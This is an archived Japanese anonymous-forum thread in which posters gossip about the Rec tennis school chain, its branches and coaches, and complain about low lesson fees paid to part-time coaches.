165 :名無しさん@エースをねらえ!:2006/12/21(木) 21:48:08 ID:cBSyunZX
一番強いコーチは誰?
社員・バイト含め

166 :名無しさん@エースをねらえ!:2006/12/21(木) 22:42:48 ID:HmItc/gf
kコーチって、誰ですか??

167 :名無しさん@エースをねらえ!:2006/12/22(金) 10:34:14 ID:BQf2fU9I
Kコーチ?
http://g007.garon.jp/gdb/GJ/2J/2R/4x/0G/tz/aI/1L/2X/vZ/0Q/uZv.jpg

168 :たか:2006/12/22(金) 14:38:54 ID:paviIlpo
どこのれっくがだめ??府中コミュ

169 :名無しさん@エースをねらえ!:2006/12/22(金) 17:57:46 ID:inKJjie2
都会の方以外は、どこも駄目でしょ!


170 :名無しさん@エースをねらえ!:2006/12/23(土) 02:54:54 ID:5KnQmOqd
ダメってどんなの〜?

171 :名無しさん@エースをねらえ!:2006/12/23(土) 05:58:02 ID:Q+0opjY+
都会?
レックに都会があるの?

172 ::2006/12/26(火) 21:52:36 ID:JDF9BvyF
武蔵境コミュニティアリーナは??

173 :名無しさん@エースをねらえ!:2006/12/27(水) 02:34:54 ID:i0Ydug6D
都会なの?という問い掛けに対しての武蔵境か?
納税額は高いが都会とは言えないな。
てゆうか狭すぎる。

174 :名無しさん@エースをねらえ!:2006/12/27(水) 03:53:01 ID:tNORJZx+
,

175 :名無しさん@エースをねらえ!:2006/12/27(水) 03:58:41 ID:QJhCo5LX
,


176 :名無しさん@エースをねらえ!:2006/12/27(水) 04:41:30 ID:QJhCo5LX
,

177 :名無しさん@エースをねらえ!:2006/12/27(水) 10:53:08 ID:3NB/cgnF
,

178 :85:2006/12/28(木) 11:04:47 ID:KIVVfjyU
違うよ〜たらたんに武蔵境はどうなのかなぁって

179 :名無しさん@エースをねらえ!:2006/12/28(木) 12:31:25 ID:0GnuIpZp
武蔵境良いみたいですよ〜!
知り合いで通ってる人がいるけど、楽しいって言ってました。

180 :48:2006/12/29(金) 23:41:09 ID:H0jGifKt
マジでー!
いってみようかなぁ。コーチの人たちも人よさげらしいし。友達がコーチ若さが増したっていってた!

181 :名無しさん@エースをねらえ!:2006/12/31(日) 02:10:17 ID:0d657KHa
若さが増したって事は新人の学生バイトが増えたって事だよね
どうなの?

182 :12:2006/12/31(日) 11:13:59 ID:3uY8TEBk
どんどん活気がでてくるようになるんじゃん?
世代交代笑

183 :名無しさん@エースをねらえ!:2007/01/01(月) 19:40:21 ID:jXMowaHF
他の店舗はどうなの?

184 :名無しさん@エースをねらえ!:2007/01/03(水) 02:07:17 ID:6cQw2PRt
高島平あたりが一番いいんじゃない?

185 :45:2007/01/03(水) 02:11:04 ID:cGDzy/kJ
チーフコーチでアシスタントコーチに厳しく当たって客にいい顔。こんな人やだ
楽しくやってほしい。

186 :名無しさん@エースをねらえ!:2007/01/03(水) 02:22:20 ID:pb15Ifjv
スタート1レッスン1350円からってありえね。
人件費削りすぎ。そりゃやめるよな。

187 :名無しさん@エースをねらえ!:2007/01/03(水) 14:54:07 ID:5lmz0Cvm
↑今って1350円からなの!?俺ん時は1200円スタートだったのに…

188 :13:2007/01/04(木) 13:30:21 ID:i35vdclS
普通はいくらくらい?

189 :名無しさん@エースをねらえ!:2007/01/05(金) 13:43:52 ID:c813PnCp
自分のときは1300円でした。
あと、チーフになっても100円くらいしか変わらなかったのがありえない。

普通は、どんなに安くても1500円くらいじゃないんですか?


自分がアルバイトコーチのときもチーフコーチがアシスタント(自分)に厳しく当たって客にいい顔されてました。
まぁ、もう自分は辞めたから言えちゃうけど・・・

190 :名無しさん@エースをねらえ!:2007/01/05(金) 13:49:08 ID:JdEvdYMF
あなたがダメコーチだったからでしょう。
こんなとこに会社の事情を書くような人だから、コーチとしても大成しなかったんでしょう。

191 :名無しさん@エースをねらえ!:2007/01/05(金) 22:44:37 ID:LELzIz5j
アシスタントでレッスンフィーが安いって言ってる君!!
球出しは満足に出来てた?
チーフの先を読んで動いてた?
まずは自分の反省からしてみたら?
どんな仕事でもそうは甘くない。

192 :アホーネット:2007/01/06(土) 01:21:00 ID:i+5rqJhQ
191さんのの言う通りだと思います。
人には向き不向きがありますし、貴方にとって 
テニスコーチと言う素晴らしい職業<お金
だったのでしょう。



193 :23:2007/01/08(月) 15:10:28 ID:xyHbdmdw
コーチって難しいけどお客さんと会話してるだけで楽しくなりますよ!

194 :名無しさん@エースをねらえ!:2007/01/08(月) 22:54:54 ID:SmvoFTNG
っつか僕のバイトしてたCAの社員さんは、自分のレッスンとアシスタント
代行探しで常にもの凄い疲れた顔してたな〜。

195 :名無しさん@エースをねらえ!:2007/01/09(火) 10:18:10 ID:5DnxaN5v
社員は疲れるだろうけど、あんまり疲れた顔を見せない方がいいよね

196 :名無しさん@エースをねらえ!:2007/01/10(水) 00:32:24 ID:QHIT4B8Y
あらあら、レッスンフィーが安いって!?
そりゃそうだ。
他のスクールに比べて、お客さんが払ったお金がバイトに
渡るまでに、レックとヨーカドーが挟まってるから
自然とバイト代が他店より安くなるよ。


197 :名無しさん@エースをねらえ!:2007/01/10(水) 09:32:34 ID:B5UEY8s+
他のスクールで雇ってもらえる実力が無い奴がコーチを語れるんだから、安い給料で我慢しなさい!
女にもモテるようになったし、人と話せるようになったでしょ?
もっと上手くなってから文句言いなさい!

198 :42:2007/01/12(金) 08:33:31 ID:FwUMjzwE
社員って大変だなー
社員より社員じゃないチーフって8割型うざい

199 :名無しさん@エースをねらえ!:2007/01/12(金) 10:26:18 ID:Z+HIgMK8
なら他のスクール行けば?
どうせ行き場が無いんだろ?

200 :13:2007/01/12(金) 12:25:08 ID:FwUMjzwE
おっまたのってきた笑

201 :名無しさん@エースをねらえ!:2007/01/12(金) 18:02:46 ID:UzuxnAMH
kコーチ本当にいや。

202 :13:2007/01/12(金) 18:33:49 ID:FwUMjzwE
どこのレックの人なの?

203 :名無しさん@エースをねらえ!:2007/01/12(金) 22:42:03 ID:L6lslhek
>201
具体的に何されたのか言わないとわかんないじゃん。レックのホームページ見たけど、kなんていっぱいいるし…

204 :名無しさん@エースをねらえ!:2007/01/13(土) 00:33:04 ID:pw7LngEI
>>197
他のスクールも行ってたけど、やっぱレックが良い!!
フィーだってここより高い所は沢山あるけど、
コーチとして今はここが一番の修行の場。
ウチは皆良い人ですぜ…!!

205 :名無しさん@エースをねらえ!:2007/01/13(土) 02:40:26 ID:9PnDXUlx
>>204は他でいくらもらってた?
俺も掛け持ちしてたが、よそでは倍以上もらってた。
ヨーカドーは若い女の子多いから楽しかったけど、自分の練習できなかった。

206 :名無しさん@エースをねらえ!:2007/01/13(土) 02:49:26 ID:pw7LngEI
あんまりお金の事は書きたくないのですが、
ここよりは…
ただ、事業所によっては練習できる環境はあると思います。
その逆も。

207 :名無しさん@エースをねらえ!:2007/01/13(土) 04:13:02 ID:Lr1AcrQ1
NeoのFコーチ嫌だ。

208 :名無しさん@エースをねらえ!:2007/01/13(土) 19:01:40 ID:5XLQ4j8T
>>207
私も!!

209 :名無しさん@エースをねらえ!:2007/01/13(土) 22:48:09 ID:Lr1AcrQ1
208
ホントですか?

210 :名無しさん@エースをねらえ!:2007/01/14(日) 14:49:53 ID:CAbl2jjY
嫌ならやめてください。
支配人

211 :名無しさん@エースをねらえ!:2007/01/14(日) 17:23:18 ID:msGVEw9A
生徒に辞めろとか言っていいんですかね?

212 :名無しさん@エースをねらえ!:2007/01/15(月) 02:30:57 ID:CrTOmuXR
一刻も早くやめてください。
別に一人や二人やめてもどうって事ないです。
何人いると思ってるんですか?
人数多いでしょ?

213 :名無しさん@エースをねらえ!:2007/01/15(月) 20:28:37 ID:qDPPYgKy
コーチにしても何にしても最低なNeoはスクールですね。

214 :名無しさん@エースをねらえ!:2007/01/15(月) 21:00:42 ID:mHvC6C3a
ok

215 :名無しさん@エースをねらえ!:2007/01/16(火) 02:06:00 ID:5htIBJFL
だいたいコーチにしたって、やる気なさすぎだし。

216 :名無しさん@エースをねらえ!:2007/01/16(火) 03:14:49 ID:o1xrNUuE
だいたい、2ちゃんとか頻繁にやってる奴はテニスなんかするな!

217 :名無しさん@エースをねらえ!:2007/01/16(火) 13:02:16 ID:5htIBJFL
そういうあなたはテニスやってんじゃないの?

218 :名無しさん@エースをねらえ!:2007/01/16(火) 19:27:50 ID:o1xrNUuE
やるかそんなもん!

219 :12:2007/01/16(火) 19:36:38 ID:gYZuLGUs
なんでここに入ってきたんだろね笑

220 :名無しさん@エースをねらえ!:2007/01/17(水) 01:32:30 ID:o6wTAfK/
だったらテニスやるななんて言うなし。

221 :名無しさん@エースをねらえ!:2007/01/18(木) 19:58:24 ID:a96aXyHh
Neoのどこが悪いんだよ

222 :名無しさん@エースをねらえ!:2007/01/18(木) 22:36:57 ID:MPbU8XWF
レックが悪いんだよ!

223 :名無しさん@エースをねらえ!:2007/01/18(木) 23:02:40 ID:a96aXyHh
レックの事業所であるNeoが悪い・・・って?

224 :名無しさん@エースをねらえ!:2007/01/19(金) 01:33:06 ID:ok049aye
Neo悪いじゃん。

コーチにしたって態度悪いし。

225 :名無しさん@エースをねらえ!:2007/01/19(金) 03:01:38 ID:9/xKCWYi
ネオで態度悪いなら他のスクール行けないね。
だからやめられないのか…。

226 :名無しさん@エースをねらえ!:2007/01/19(金) 03:03:28 ID:ok049aye
Yes〜♪

中には良いコーチもいるから辞められないのょ

227 :名無しさん@エースをねらえ!:2007/01/19(金) 10:37:50 ID:9/xKCWYi
他のスクールではあなたみたいな人を受け入れてくれないようだね。
かわいそうに。
ネオのコーチは我慢強いね。

228 :名無しさん@エースをねらえ!:2007/01/19(金) 15:59:38 ID:jaLgCLQ2
社会人になってサークルでテニスを始めたんですが、我流なものでスクールに通おうと思ってます。真剣に上手くなりたいんですが、武蔵小杉のスクールとかどうですか?テニスが上手くて、教えるのも熱心なコーチはいますか?

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)